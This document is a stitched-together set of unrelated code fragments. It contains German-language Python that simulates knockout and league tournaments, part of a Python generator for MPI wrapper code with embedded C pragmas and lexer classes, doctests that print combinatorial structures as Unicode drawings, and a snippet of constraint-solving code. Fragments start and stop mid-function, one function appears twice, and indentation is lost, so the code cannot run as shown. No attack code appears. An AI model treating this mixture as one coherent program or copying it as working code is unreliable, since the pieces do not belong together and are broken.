round1plan["group{0}".format(i+1)] = player_order[x], player_order[x+1]
print("Der Turnierplan wurde zufällig erstellt")
print(round1plan)
elif tournament_schedule == 3:
loop = False
round1plan = {}
playeramount_half = int(playeramount / 2)
check = []
print(playeramount_half)
for i in range (0, playeramount_half):
checker = True
while checker:
checker = False
i_plus = i+1
try:
player1 = int(input("Erster Spieler der Gruppe" + str(i_plus) + "\n:"))
except ValueError:
print("Deine Eingabe ist leider keine Ganze Zahl vom Typ (Integer)")
checker = True
continue
try:
player2 = int(input("Zweiter Spieler der Gruppe" + str(i_plus) + "\n:"))
except ValueError:
print("Deine Eingabe ist leider keine Ganze Zahl vom Typ (Integer)")
checker = True
continue
for x in check:
print("Check wird durchgeführt")
if x == player1:
print("Du hast leider Spieler", player1, " schon zugewiesen\nBitte wähle einen anderen Spieler für den ersten Spieler der Gruppe" + str(i_plus))
checker = True
continue
if x == player2:
print("Du hast leider Spieler", player2, " schon zugewiesen\nBitte wähle einen anderen Spieler für den ersten Spieler der Gruppe" + str(i_plus))
checker = True
continue
check.append(player1)
check.append(player2)
round1plan["group{0}".format(i+1)] = player1 - 1, player2 - 1
print(check)
print(round1plan)
else:
print("Bitte gebe einen zahl zwischen 1 und 3 ein")
for _ in range(1):
round3plan = {}
round3list = []
playeramount_loop = playeramount_half
print(playeramount_loop)
round2plan = round1plan
print(round2plan)
while playeramount_loop / 2 >= 1 or playeramount_loop == 1:
if playeramount_loop == 1:
print("Finale Runde")
print(round2plan)
players = round2plan["group"+str(1)]
playerone = players[0]
playertwo = players[1]
playerone_power = int(playerlist[playerone])
playertwo_power = int(playerlist[playertwo])
random_number = random.randint(1, playerone_power + playertwo_power)
print(random_number)
if 0 <= random_number <= playerone_power:
print("Spieler " + str(playerone) + " hat gewonnen mit einer Power von " + str(playerone_power))
#winnerlist.append(playerone)
else:
print("Spieler " + str(playertwo) + " hat gewonnen mit einer Power von " + str(playertwo_power))
#winnerlist.append(playertwo)
break
for i in range(1, playeramount_loop + 1):
players = round2plan["group"+str(i)]
print(players)
playerone = players[0]
playertwo = players[1]
playerone_power = int(playerlist[playerone])
playertwo_power = int(playerlist[playertwo])
random_number = random.randint(1, playerone_power + playertwo_power)
if 0 <= random_number <= playerone_power:
print("Spieler 1 hat gewonnen")
round3list.append(playerone)
else:
print("Spieler 2 hat gewonnen")
round3list.append(playertwo)
print(playerone)
print(playerone_power)
print(playertwo)
print(playertwo_power)
print("liste",round3list)
xy = int(playeramount_loop / 2)
#xy = xy + 1
for x in range (1,xy + 1):
if x == 1:
round3plan["group{0}".format(x)] = round3list[0], round3list[1]
else:
y = x - 1
y = y * 2
round3plan["group{0}".format(x)] = round3list[y], round3list[y+1]
round3list = []
print(round3plan)
round2plan = round3plan
round3plan = {}
playeramount_loop = int(playeramount_loop / 2)
print(playeramount_loop)
#winner_end = mode(winnerlist)
#winner = playerlist[int(winner_end)]
#print(winner_end)
#print(name)
#print("Spieler" + str(winner_end) + "hat im Durschnitt am häufigsten gewonnen mit einer Stärke von " , winner , "\n")
#print(playerlist)
def liga(dataarray,name):
winnerlist = []
playeramount = int(dataarray.pop(0))
for _ in range(1):
print("\n" + "Starte Liga mit der Datei " + name)
playerlist = dataarray
print(playeramount)
print(playerlist)
wins = playeramount * [0]
print(wins)
print(wins)
for i in range (0,playeramount-1):
print("\n")
print("spieler" + str(i))
print(playerlist[i])
print("\n")
powerplayeri = int(playerlist[i])
for x in range (i+1,playeramount):
print("spieler" + str(x))
print(playerlist[x])
powerplayerx = int(playerlist[x])
random_number = random.randint(0, powerplayeri + powerplayerx)
print("Zufallszahl"+ str(random_number))
if 0 <= random_number <= powerplayeri:
print("Spieler" + str(i) + "hat gewonnen")
win = wins[i]
win = win + 1
wins[i] = win
else:
print("Spieler" + str(x) + "hat gewonnen")
win = wins[x]
win = win + 1
wins[x] = win
print("Die Ergebnisse stehen fest ", wins)
max = wins[0]
print("Länge siege", len(wins))
print("Array wins ",wins)
for i in range(0,len(wins)):
if(wins[i] > max):
max = wins[i]
print("Die größte Anzahl an Siegen ist ", max)
#testen ob es mehrere Gewinner gibt
winner_arr_power = []
winner_arr_index = []
for i in range(0,len(wins)):
if wins[i] == max:
winner_arr_index.append(i)
for i in winner_arr_index:
winner_arr_power.append(playerlist[i])
print(winner_arr_index)
print(winner_arr_power)
length_winner_power = len(winner_arr_power)
if length_winner_power > 1:
print("Es gibt mehrere Gewinner und zwar ", length_winner_power)
ask = str(input("Was möchtest du machen? Soll es mehrere Gewinner geben dann skipe mit (skip)\nOder möchtest du ein KO zwischen den Spielern mit den meisten siegen (ko)\n:"))
if ask == "skip":
for i in range(0,length_winner_power):
print("Spieler" + str(winner_arr_index[i]) + " hat gewonnen mit einer Angriffstärke von " + str(winner_arr_power[i]))
elif ask == "ko":
print("Das KO System wird aufgerufen......")
if length_winner_power % 2 == 1:
print("Die Anzahl an Spielern ist ungrade wir müssen leider einen disqualifizieren")
print("Dies wird zufällig entschieden")
rdmn = random.randint(0, length_winner_power - 1)
winner_arr_power.pop(rdmn)
param = "Finale"
players = len(winner_arr_power)
for i in range (0, len(winner_arr_index)):
print("Spieler" + str(winner_arr_index[i]) + " wird als Spieler" + str(i) + " antreten.")
winner_arr_power.insert(0,players)
ko(winner_arr_power, param)
else:
print("Ungültige Eingabe gebe bitte (skip) oder (ko) ein")
else:
index = wins.index(max)
print("Der Index ist", index)
winner = playerlist[index]
print("Spieler" + str(index) + " hat gewonnen mit einer Angriffstärke von " + winner)
#winnerlist.append(str(index))
#winner_end = mode(winnerlist)
#winner = playerlist[int(winner_end)]
#print(winner_end)
# print(name)
# print("Spieler" + str(winner_end) + "hat im Durschnitt am häufigsten gewonnen mit einer Stärke von " , winner , "\n")
# print(playerlist)
def read_from_file(filename):
file1 = open(filename, "r").read().split('\n')
filearray = []
for i in file1:
filearray.append(i)
return filearray
def ko5(dataarray, name, skip):
winnerlist = []
playeramount = int(dataarray.pop(0))
playerlist = dataarray
if playeramount % 2 == 1:
print("Deine Spielerzahl ist leider ungerade somit geht das KO System nicht auf")
ask = input("Es wird nun ein Spieler zufällig disqualifiziert\n Falls du das nicht willst schreibe (n) \nIn dem Fall wenn du n eingibst musst du entweder vor dem Neustart deine Spieleranzahl in eine gerade Zahl umwandeln oder das Liga System verwenden.")
if ask == "n" or ask == "N":
sys.exit(0)
else:
rdmn = random.randint(0,playeramount-1)
playerlist.pop(rdmn)
playeramount = playeramount - 1
loop = True
print(playerlist[0])
while loop:
if skip == False:
try:
tournament_schedule = int(input("Welchen Tunierplan möchtest du benutzen durchnumerriert nach der Ordnung der Textdatei(1), zufällig (2), manueller Plan (3)"))
except ValueError:
print("Dein Input leider keine ganze Zahl")
else:
tournament_schedule = 1
if tournament_schedule == 1:
loop = False
round1plan = {}
playeramount_half = int(playeramount / 2)
for i in range (1, playeramount_half + 1):
print(i)
if i ==1:
round1plan["group{0}".format(i)] = 0, 1
else:
x = i-1
x = x *2
round1plan["group{0}".format(i)] = x, x+1
print(round1plan)
print("Der Turierplan wird nach der Ordnung der Textdatei erstellt")
elif tournament_schedule == 2:
loop = False
round1plan = {}
playeramount_half = int(playeramount / 2)
check = []
player_order = []
for i in range (0,playeramount-1):
check.append(i)
print(check)
while len(check) != 0:
random_number = random.randint(0,playeramount-1)
try:
check.remove(random_number)
except:
continue
player_order.append(random_number)
print(player_order)
for i in range (0,playeramount_half):
x = i-1
x = x *2
round1plan["group{0}".format(i+1)] = player_order[x], player_order[x+1]
print("Der Turnierplan wurde zufällig erstellt")
print(round1plan)
| |
weak mpifcmb3_
#pragma weak MPIFCMB3__
#pragma weak mpifcmb3__
#pragma weak MPIFCMB4
#pragma weak mpifcmb4
#pragma weak MPIFCMB4_
#pragma weak mpifcmb4_
#pragma weak MPIFCMB4__
#pragma weak mpifcmb4__
/* Argonne Fortran MPI wrappers */
#pragma weak MPIR_F_MPI_BOTTOM
#pragma weak MPIR_F_MPI_IN_PLACE
#pragma weak MPI_F_MPI_BOTTOM
#pragma weak MPI_F_MPI_IN_PLACE
#endif
#if defined(MPICH_NAME) && (MPICH_NAME == 1) /* MPICH has no MPI_IN_PLACE */
#define BufferC2F(x) (IsBottom(x) ? MPI_BOTTOM : (x))
#else
#define BufferC2F(x) (IsBottom(x) ? MPI_BOTTOM : (IsInPlace(x) ? MPI_IN_PLACE : (x)))
#endif /* defined(MPICH_NAME) && (MPICH_NAME == 1) */
#else
#define BufferC2F(x) (x)
#endif /* defined(__GNUC__) || defined(__INTEL_COMPILER) || defined(__PGI) || defined(_CRAYC) */
'''
wrapper_main_pmpi_init_decls ='''
#if (defined(PIC) || defined(__PIC__))
/* For shared libraries, declare these weak and figure out which one was linked
based on which init wrapper was called. See mpi_init wrappers. */
#pragma weak pmpi_init
#pragma weak PMPI_INIT
#pragma weak pmpi_init_
#pragma weak pmpi_init__
#pragma weak pmpi_init_thread
#pragma weak PMPI_INIT_THREAD
#pragma weak pmpi_init_thread_
#pragma weak pmpi_init_thread__
#endif /* PIC */
_EXTERN_C_ void pmpi_init(MPI_Fint *ierr);
_EXTERN_C_ void PMPI_INIT(MPI_Fint *ierr);
_EXTERN_C_ void pmpi_init_(MPI_Fint *ierr);
_EXTERN_C_ void pmpi_init__(MPI_Fint *ierr);
_EXTERN_C_ void pmpi_init_thread(MPI_Fint *required, MPI_Fint *provided, MPI_Fint *ierr);
_EXTERN_C_ void PMPI_INIT_THREAD(MPI_Fint *required, MPI_Fint *provided, MPI_Fint *ierr);
_EXTERN_C_ void pmpi_init_thread_(MPI_Fint *required, MPI_Fint *provided, MPI_Fint *ierr);
_EXTERN_C_ void pmpi_init_thread__(MPI_Fint *required, MPI_Fint *provided, MPI_Fint *ierr);
'''
# Declarations from the .w file to be repeated in every source file.
declarations = None
# Macros used to suppress MPI deprecation warnings.
wrapper_diagnosics_macros = '''
/* Macros to enable and disable compiler warnings for deprecated functions.
* These macros will be used to silent warnings about deprecated MPI functions,
* as these should be wrapped, even if they are deprecated.
*
* Note: The macros support GCC and clang compilers only. For other compilers
* just add similar macros for your compiler.
*/
#ifndef WRAP_MPI_CALL_PREFIX
#if defined(__clang__)
#define WRAP_MPI_CALL_PREFIX \\
_Pragma("clang diagnostic push"); \\
_Pragma("clang diagnostic ignored \\"-Wdeprecated-declarations\\"");
#define WRAP_MPI_CALL_POSTFIX _Pragma("clang diagnostic pop");
#elif defined(__INTEL_COMPILER)
#define WRAP_MPI_CALL_PREFIX \\
_Pragma("warning push"); \\
_Pragma("warning(disable:1786)");
#define WRAP_MPI_CALL_POSTFIX _Pragma("warning pop")
#elif (defined(__GNUC__) && \\
((__GNUC__ == 4 && __GNUC_MINOR__ >= 6) || __GNUC__ > 4))
#define WRAP_MPI_CALL_PREFIX \\
_Pragma("GCC diagnostic push"); \\
_Pragma("GCC diagnostic ignored \\"-Wdeprecated-declarations\\"");
#define WRAP_MPI_CALL_POSTFIX _Pragma("GCC diagnostic pop");
#else
#define WRAP_MPI_CALL_PREFIX
#define WRAP_MPI_CALL_POSTFIX
#endif
#endif
'''
# Default modifiers for generated bindings
default_modifiers = ["_EXTERN_C_"] # _EXTERN_C_ is #defined (or not) in wrapper_includes. See above.
# Set of MPI Handle types
mpi_handle_types = set(["MPI_Comm", "MPI_Errhandler", "MPI_File", "MPI_Group", "MPI_Info",
"MPI_Op", "MPI_Request", "MPI_Status", "MPI_Datatype", "MPI_Win" ])
# MPI Calls that have array parameters, and mappings from the array parameter
# positions to the position of the 'count' parameters that determine their size.
mpi_array_calls = {
"MPI_Startall" : { 1:0 },
"MPI_Testall" : { 1:0, 3:0 },
"MPI_Testany" : { 1:0 },
"MPI_Testsome" : { 1:0, 4:0 },
"MPI_Type_create_struct" : { 3:0 },
"MPI_Type_get_contents" : { 6:1 },
"MPI_Type_struct" : { 3:0 },
"MPI_Waitall" : { 1:0, 2:0 },
"MPI_Waitany" : { 1:0 },
"MPI_Waitsome" : { 1:0, 4:0 }
}
# MPI Calls that have an array index output parameter (i.e. "int *index") and
# position of that 'index' parameter. Needs special casing when wrapping Fortran
# calls (arrays '1' indexed) to C (arrays '0' indexed). May also be MPI_UNDEFINED.
mpi_array_index_output_calls = {
"MPI_Testany" : 2,
"MPI_Waitany" : 2
}
# MPI Calls that have an array of array-indices as an output parameter (i.e.
# "int *array_of_indices") and mappings from the position of that 'array_of_indices'
# to the position of the output parameter that determines its size.
# Needs special casing when wrapping Fortran calls (arrays '1' indexed) to C
# (arrays '0' indexed).
mpi_array_index_array_output_calls = {
"MPI_Testsome" : { 3:2 },
"MPI_Waitsome" : { 3:2 }
}
def find_matching_paren(string, index, lparen='(', rparen=')'):
"""Find the closing paren corresponding to the open paren at <index>
in <string>. Optionally, can provide other characters to match on.
If found, returns the index of the matching parenthesis. If not found,
returns -1.
"""
if not string[index] == lparen:
raise ValueError("Character at index %d is '%s'. Expected '%s'"
% (index, string[index], lparen))
index += 1
count = 1
while index < len(string) and count > 0:
while index < len(string) and string[index] not in (lparen, rparen):
index += 1
if string[index] == lparen:
count += 1
elif string[index] == rparen:
count -= 1
if count == 0:
return index
else:
return -1
def find_matching_paren(string, index, lparen='(', rparen=')'):
"""Find the closing paren corresponding to the open paren at <index>
in <string>. Optionally, can provide other characters to match on.
If found, returns the index of the matching parenthesis. If not found,
returns -1.
"""
if not string[index] == lparen:
raise ValueError("Character at index %d is '%s'. Expected '%s'"
% (index, string[index], lparen))
index += 1
count = 1
while index < len(string) and count > 0:
while index < len(string) and string[index] not in (lparen, rparen):
index += 1
if string[index] == lparen:
count += 1
elif string[index] == rparen:
count -= 1
if count == 0:
return index
else:
return -1
def isindex(str):
"""True if a string is something we can index an array with."""
try:
int(str)
return True
except ValueError:
return False
def once(function):
if not hasattr(function, "did_once"):
function()
function.did_once = True
# Returns MPI_Blah_[f2c,c2f] prefix for a handle type. MPI_Datatype is a special case.
def conversion_prefix(handle_type):
if handle_type == "MPI_Datatype":
return "MPI_Type"
else:
return handle_type
# Special join function for joining lines together. Puts "\n" at the end too.
def joinlines(list, sep="\n"):
if list:
return sep.join(list) + sep
else:
return ""
def static_out(function):
if not function in static_files:
static_filename = static_dir + '/' + function + '.c'
file = open(static_filename, "w")
file.write(wrapper_includes)
if output_fortran_wrappers:
file.write(fortran_wrapper_includes)
if declarations:
file.write(declarations)
if output_guards: file.write("extern int in_wrapper;\n")
static_files[function] = file
else:
file = static_files[function]
return file
# Possible types of Tokens in input.
LBRACE, RBRACE, TEXT, IDENTIFIER = range(4)
class Token:
"""Represents tokens; generated from input by lexer and fed to parse()."""
def __init__(self, type, value, line=0):
self.type = type # Type of token
self.value = value # Text value
self.line = line
def __str__(self):
return "'%s'" % re.sub(r'\n', "\\\\n", self.value)
def isa(self, type):
return self.type == type
class LineTrackingLexer(object):
"""Base class for Lexers that keep track of line numbers."""
def __init__(self, lexicon):
self.line_no = -1
self.scanner = re.Scanner(lexicon)
def make_token(self, type, value):
token = Token(type, value, self.line_no)
self.line_no += value.count("\n")
return token
def lex(self, text):
self.line_no = 0
tokens, remainder = self.scanner.scan(text)
if remainder:
sys.stderr.write("Unlexable input:\n%s\n" % remainder)
sys.exit(1)
self.line_no = -1
return tokens
class OuterRegionLexer(LineTrackingLexer):
def __init__(self):
super(OuterRegionLexer, self).__init__([
(r'{{', self.lbrace),
(r'}}', self.rbrace),
(r'({(?!{)|}(?!})|[^{}])*', self.text)])
def lbrace(self, scanner, token): return self.make_token(LBRACE, token)
def rbrace(self, scanner, token): return self.make_token(RBRACE, token)
def text(self, scanner, token): return self.make_token(TEXT, token)
class OuterCommentLexer(OuterRegionLexer):
def __init__(self):
super(OuterRegionLexer, self).__init__([
(r'/\*(.|[\r\n])*?\*/', self.text), # multiline comment
(r'//(.|[\r\n])*?(?=[\r\n])', self.text), # single line comment
(r'{{', self.lbrace),
(r'}}', self.rbrace),
(r'({(?!{)|}(?!})|/(?![/*])|[^{}/])*', self.text)])
class InnerLexer(OuterRegionLexer):
def __init__(self):
super(OuterRegionLexer, self).__init__([
(r'{{', self.lbrace),
(r'}}', self.rbrace),
(r'(["\'])?((?:(?!\1)[^\\]|\\.)*)\1', self.quoted_id),
(r'([^\s]+)', self.identifier),
(r'\s+', None)])
def identifier(self, scanner, token): return self.make_token(IDENTIFIER, token)
def quoted_id(self, scanner, token):
# remove quotes from quoted ids. Note that ids and quoted ids are pretty much the same thing;
# the quotes are just optional. You only need them if you need spaces in your expression.
return self.make_token(IDENTIFIER, re.sub(r'^["\'](.*)["\']$', '\\1', token))
# Global current filename and function name for error msgs
cur_filename = ""
cur_function = None
class WrapSyntaxError(Exception):
"""Simple Class for syntax errors raised by the wrapper generator (rather than python)"""
pass
def syntax_error(msg):
# TODO: make line numbers actually work.
sys.stderr.write("%s:%d: %s\n" % (cur_filename, 0, msg))
if cur_function:
sys.stderr.write(" While handling %s.\n" % cur_function)
raise WrapSyntaxError
################################################################################
# MPI Semantics:
# Classes in this section describe MPI declarations and types. These are used
# to parse the mpi.h header and to generate wrapper code.
################################################################################
class Scope:
""" This is the very basic class for scopes in the wrapper generator. Scopes
are hierarchical and support nesting. They contain string keys mapped
to either string values or to macro functions.
Scopes also keep track of the particular macro they correspond to (macro_name).
"""
def __init__(self, enclosing_scope=None):
self.map = {}
self.enclosing_scope = enclosing_scope
self.macro_name = None # For better debugging error messages
def __getitem__(self, key):
if key in self.map: return self.map[key]
elif self.enclosing_scope: return self.enclosing_scope[key]
else: raise KeyError(key + " is not in scope.")
def __contains__(self, key):
if key in self.map: return True
elif self.enclosing_scope: return key in self.enclosing_scope
else: return False
def __setitem__(self, key, value):
self.map[key] = value
def include(self, map):
"""Add entire contents of | |
# doctest: +NORMALIZE_WHITESPACE
★
/ ★
/ ★
/ ★
<BLANKLINE>
★
/ / ★
/ ★
<BLANKLINE>
/ ★
/ / ★
<BLANKLINE>
★
/ ★
/ / ★
<BLANKLINE>
★
/ / / ★
>>> print(next(representations)) # doctest: +NORMALIZE_WHITESPACE
★
/ ★
/ ★
/ ★
/ ★
<BLANKLINE>
★
/ / ★
/ ★
/ ★
<BLANKLINE>
/ ★
/ / ★
/ ★
<BLANKLINE>
/
/ ★
/ / ★
<BLANKLINE>
★
/ ★
/ / ★
/ ★
<BLANKLINE>
★
/ / / ★
/ ★
<BLANKLINE>
/ / ★
/ / ★
<BLANKLINE>
★
/ / ★
/ / ★
<BLANKLINE>
/ ★
/ / / ★
<BLANKLINE>
★
/ ★
/ ★
/ / ★
<BLANKLINE>
★
/ / ★
/ / ★
<BLANKLINE>
/ ★
/ / / ★
<BLANKLINE>
★
/ ★
/ / / ★
<BLANKLINE>
★
/ / / / ★
Ballots
=======
>>> rows, cols = 3, 25
>>> coor, number = coordinates(rows), numbering(rows)
>>> linears = recursive_structures((ballot_shapes, 'linear'), 1, (coor, number))
>>> representations = map(make_pretty((rows, cols),), linears)
>>> print(next(representations)) # doctest: +NORMALIZE_WHITESPACE
★
>>> print(next(representations)) # doctest: +NORMALIZE_WHITESPACE
●★★
>>> print(next(representations)) # doctest: +NORMALIZE_WHITESPACE
●●★★★
<BLANKLINE>
● ●★★
>>> print(next(representations)) # doctest: +NORMALIZE_WHITESPACE
●●●★★★★
<BLANKLINE>
●● ●★★★
<BLANKLINE>
●● ●★★
<BLANKLINE>
● ●●★★★
<BLANKLINE>
● ● ●★★
>>> print(next(representations)) # doctest: +NORMALIZE_WHITESPACE
●●●●★★★★★
<BLANKLINE>
●●● ●★★★★
<BLANKLINE>
●●● ●★★★
<BLANKLINE>
●●● ●★★
<BLANKLINE>
●● ●●★★★★
<BLANKLINE>
●● ● ●★★★
<BLANKLINE>
●● ● ●★★
<BLANKLINE>
●● ●●★★★
<BLANKLINE>
●● ● ●★★
<BLANKLINE>
● ●●●★★★★
<BLANKLINE>
● ●● ●★★★
<BLANKLINE>
● ●● ●★★
<BLANKLINE>
● ● ●●★★★
<BLANKLINE>
● ● ● ●★★
Balanced parens
===============
>>> rows, cols = 3, 32
>>> coor, number = coordinates(rows), numbering(rows)
>>> parens = recursive_structures((balanced_parens_shapes, 'parens'), 1, (coor, number))
>>> representations = map(make_pretty((rows, cols),), parens)
>>> print(next(representations)) # doctest: +NORMALIZE_WHITESPACE
★
>>> print(next(representations)) # doctest: +NORMALIZE_WHITESPACE
(★ ★
>>> print(next(representations)) # doctest: +NORMALIZE_WHITESPACE
((★ ★ ★
<BLANKLINE>
( (★ ★
>>> print(next(representations)) # doctest: +NORMALIZE_WHITESPACE
(((★ ★ ★ ★
<BLANKLINE>
(( (★ ★ ★
<BLANKLINE>
(( (★ ★
<BLANKLINE>
( ((★ ★ ★
<BLANKLINE>
( ( (★ ★
>>> print(next(representations)) # doctest: +NORMALIZE_WHITESPACE
((((★ ★ ★ ★ ★
<BLANKLINE>
((( (★ ★ ★ ★
<BLANKLINE>
((( (★ ★ ★
<BLANKLINE>
((( (★ ★
<BLANKLINE>
(( ((★ ★ ★ ★
<BLANKLINE>
(( ( (★ ★ ★
<BLANKLINE>
(( ( (★ ★
<BLANKLINE>
(( ((★ ★ ★
<BLANKLINE>
(( ( (★ ★
<BLANKLINE>
( (((★ ★ ★ ★
<BLANKLINE>
( (( (★ ★ ★
<BLANKLINE>
( (( (★ ★
<BLANKLINE>
( ( ((★ ★ ★
<BLANKLINE>
( ( ( (★ ★
Plane trees
===========
>>> rows, cols = 10, 25
>>> coor, number = coordinates(rows), numbering(rows)
>>> plane_trees = recursive_structures((plane_trees_shapes, 'plane'), 4, (coor, number))
>>> representations = map(make_pretty((rows, cols),), plane_trees)
>>> print(next(representations)) # doctest: +NORMALIZE_WHITESPACE
★
>>> print(next(representations)) # doctest: +NORMALIZE_WHITESPACE
★
Λ
★
>>> print(next(representations)) # doctest: +NORMALIZE_WHITESPACE
★
Λ
Λ★
★
<BLANKLINE>
Λ★
Λ
★
>>> print(next(representations)) # doctest: +NORMALIZE_WHITESPACE
★
Λ
Λ★
Λ★
★
<BLANKLINE>
Λ★
ΛΛ
★★
<BLANKLINE>
Λ
Λ★
Λ
★
<BLANKLINE>
★
ΛΛ
Λ★
★
<BLANKLINE>
Λ
Λ★
Λ
★
>>> print(next(representations)) # doctest: +NORMALIZE_WHITESPACE
★
Λ
Λ★
Λ★
Λ★
★
<BLANKLINE>
Λ★
ΛΛ
Λ★★
★
<BLANKLINE>
Λ
Λ★
ΛΛ
★★
<BLANKLINE>
Λ
Λ
Λ★
Λ
★
<BLANKLINE>
★
ΛΛ
ΛΛ★
★★
<BLANKLINE>
Λ
ΛΛ,★
Λ★
★
<BLANKLINE>
Λ
ΛΛ★
Λ
★
<BLANKLINE>
Λ★
ΛΛ
Λ★
★
<BLANKLINE>
Λ
Λ
Λ★
Λ
★
<BLANKLINE>
★
Λ
ΛΛ★
Λ★
★
<BLANKLINE>
ΛΛ★
ΛΛ
★★
<BLANKLINE>
ΛΛ
Λ★
Λ
★
<BLANKLINE>
Λ ★
ΛΛ
Λ★
★
<BLANKLINE>
Λ
Λ
Λ★
Λ
★
Triangulated polygons
=====================
>>> rows, cols = 8, 25
>>> coor, number = coordinates(rows), numbering(rows)
>>> triangulated = recursive_structures((triangulated_shapes, 'north'), rows*12+4, (coor, number))
>>> representations = map(make_pretty((rows, cols),), triangulated)
>>> print(next(representations)) # doctest: +NORMALIZE_WHITESPACE
★
>>> print(next(representations)) # doctest: +NORMALIZE_WHITESPACE
★▲★
>>> print(next(representations)) # doctest: +NORMALIZE_WHITESPACE
★
★▼▲★
<BLANKLINE>
★
▲▼★
>>> print(next(representations)) # doctest: +NORMALIZE_WHITESPACE
★
★▲▼▲★
★
<BLANKLINE>
★▲★
▼▲★
<BLANKLINE>
★
▼▲▼★
<BLANKLINE>
★▲★
▲▼★
<BLANKLINE>
▲▼▲★
★
>>> print(next(representations)) # doctest: +NORMALIZE_WHITESPACE
★ ★
★▼▲▼▲★
★
<BLANKLINE>
★
▲▼▲★
★▼★
<BLANKLINE>
★▲★
▲▼▲★
<BLANKLINE>
★
▲▼▲▼★
<BLANKLINE>
★
★▼▲★
▼▲★
<BLANKLINE>
★
▲▼★
▼▲★
<BLANKLINE>
▲ ★
▼▲▼★
<BLANKLINE>
★▲★
▼▲▼★
<BLANKLINE>
▼▲▼▲★
★
<BLANKLINE>
★
★▼▲★
▲▼★
<BLANKLINE>
★
▲▼★
▲▼★
<BLANKLINE>
▲
▲▼▲★
★
<BLANKLINE>
▲▼▲★
★▼★
<BLANKLINE>
★
▲▼▲▼★
Blocks
======
>>> rows, cols = 10, 25
>>> coor, number = coordinates(rows), numbering(rows)
>>> blocks = recursive_structures((blocks_shapes, 'block'), 4, (coor, number))
>>> representations = map(make_pretty((rows, cols), joiner=' '), blocks)
>>> print(next(representations)) # doctest: +NORMALIZE_WHITESPACE
★
>>> print(next(representations)) # doctest: +NORMALIZE_WHITESPACE
★
▢ ★
>>> print(next(representations)) # doctest: +NORMALIZE_WHITESPACE
★
▢ ★
▢ ★
<BLANKLINE>
★
▢ ▢ ★
>>> print(next(representations)) # doctest: +NORMALIZE_WHITESPACE
★
▢ ★
▢ ★
▢ ★
<BLANKLINE>
★
▢ ▢ ★
▢ ★
<BLANKLINE>
▢ ★
▢ ▢ ★
<BLANKLINE>
★
▢ ★
▢ ▢ ★
<BLANKLINE>
★
▢ ▢ ▢ ★
>>> print(next(representations)) # doctest: +NORMALIZE_WHITESPACE
★
▢ ★
▢ ★
▢ ★
▢ ★
<BLANKLINE>
★
▢ ▢ ★
▢ ★
▢ ★
<BLANKLINE>
▢ ★
▢ ▢ ★
▢ ★
<BLANKLINE>
▢
▢ ★
▢ ▢ ★
<BLANKLINE>
★
▢ ★
▢ ▢ ★
▢ ★
<BLANKLINE>
▢ ▢,★ ★
▢ ▢ ★
<BLANKLINE>
★
▢ ▢ ▢ ★
▢
<BLANKLINE>
★
▢ ▢ ★
▢ ▢ ★
<BLANKLINE>
▢ ★
▢ ▢ ▢ ★
<BLANKLINE>
★
▢ ★
▢ ★
▢ ▢ ★
<BLANKLINE>
★
▢ ▢ ★
▢ ▢ ★
<BLANKLINE>
▢ ★
▢ ▢ ▢ ★
<BLANKLINE>
★
▢ ★
▢ ▢ ▢ ★
<BLANKLINE>
★
▢ ▢ ▢ ▢ ★
Rabbits
=======
>>> rows, cols = 8, 25
>>> coor, number = coordinates(rows), numbering(rows)
>>> rabbits = recursive_structures((rabbits_shapes, 'young'), 4, (coor, number))
>>> representations = map(make_pretty((rows, cols), joiner=''), rabbits)
>>> print(next(representations)) # doctest: +NORMALIZE_WHITESPACE
★
>>> print(next(representations)) # doctest: +NORMALIZE_WHITESPACE
★
○
>>> print(next(representations)) # doctest: +NORMALIZE_WHITESPACE
●▲
○ ★
>>> print(next(representations)) # doctest: +NORMALIZE_WHITESPACE
★
●○
○ ★
<BLANKLINE>
●
○ ●▲
★
>>> print(next(representations)) # doctest: +NORMALIZE_WHITESPACE
★
●○
○ ●▲
★
<BLANKLINE>
●▲
●○ ★
○
<BLANKLINE>
● ★
○ ●○
★
<BLANKLINE>
●
○ ●
●▲
★
>>> print(next(representations)) # doctest: +NORMALIZE_WHITESPACE
●▲
●○ ★
○ ●▲
★
<BLANKLINE>
●○ ★
○ ●○
★
<BLANKLINE>
●○
○ ●
●▲
★
<BLANKLINE>
★
●○
●○ ★
○
<BLANKLINE>
●
●○ ●▲
○ ★
<BLANKLINE>
● ★
○ ●○
●▲
★
<BLANKLINE>
● ●▲
○ ●○ ★
<BLANKLINE>
●
○ ● ★
●○
★
<BLANKLINE>
●
○ ●
●
●▲
★
Steep parallelograms
====================
>>> rows, cols = 14, 25
>>> coor, number = coordinates(rows), numbering(rows)
>>> steep_parallelograms = recursive_structures((steep_shapes, 'one_star'), 7, (coor, number))
>>> representations = map(make_pretty((rows, cols), joiner=' '), steep_parallelograms)
>>> print(next(representations)) # doctest: +NORMALIZE_WHITESPACE
★
>>> print(next(representations)) # doctest: +NORMALIZE_WHITESPACE
☆
▢
>>> print(next(representations)) # doctest: +NORMALIZE_WHITESPACE
☆
▢ ★
▢
>>> print(next(representations)) # doctest: +NORMALIZE_WHITESPACE
☆
▢ ★
▢ ★
▢
<BLANKLINE>
☆
▢ ▢
▢
>>> print(next(representations)) # doctest: +NORMALIZE_WHITESPACE
☆
▢ ★
▢ ★
▢ ★
▢
<BLANKLINE>
☆
▢ ▢
▢ ★
▢
<BLANKLINE>
▢ ☆
▢ ▢
▢
<BLANKLINE>
☆
▢ ★
▢ ▢
▢
>>> print(next(representations)) # doctest: +NORMALIZE_WHITESPACE
☆
▢ ★
▢ ★
▢ ★
▢ ★
▢
<BLANKLINE>
☆
▢ ▢
▢ ★
▢ ★
▢
<BLANKLINE>
▢ ☆
▢ ▢
▢ ★
▢
<BLANKLINE>
▢
▢ ☆
▢ ▢
▢
<BLANKLINE>
☆
▢ ★
▢ ▢
▢ ★
▢
<BLANKLINE>
▢ ▢,☆
▢ ▢
▢
<BLANKLINE>
☆
▢ ▢ ★
▢ ▢
▢
<BLANKLINE>
☆
▢ ★
▢ ★
▢ ▢
▢
<BLANKLINE>
☆
▢ ▢
▢ ▢
▢
Sigmoids
========
>>> rows, cols = 9, 25
| |
elif isinstance(desc[key], dict) and 'constraint__' in desc[key]: # This is a constraint
res.append([(1, path + [key], desc[key])])
elif isinstance(desc[key], dict):
res += walk_props_for_constraints(desc[key], path + [key])
elif key != "name" or path != "": # Add an equality constraint for a value, except the object name
res.append([(1, path + [key], desc[key])])
return res
def grounded_clause(constraint_clause, resource):
# The clause is a list of unbounded variables to be bound to the resource (ultimately to other constraint vars to)
# For efficiency, also checks truth and skips any constraint_var in the clause that cannot be true.
# If none can be true then generate_clauses turns into the unary clause saying the resource cannot match.
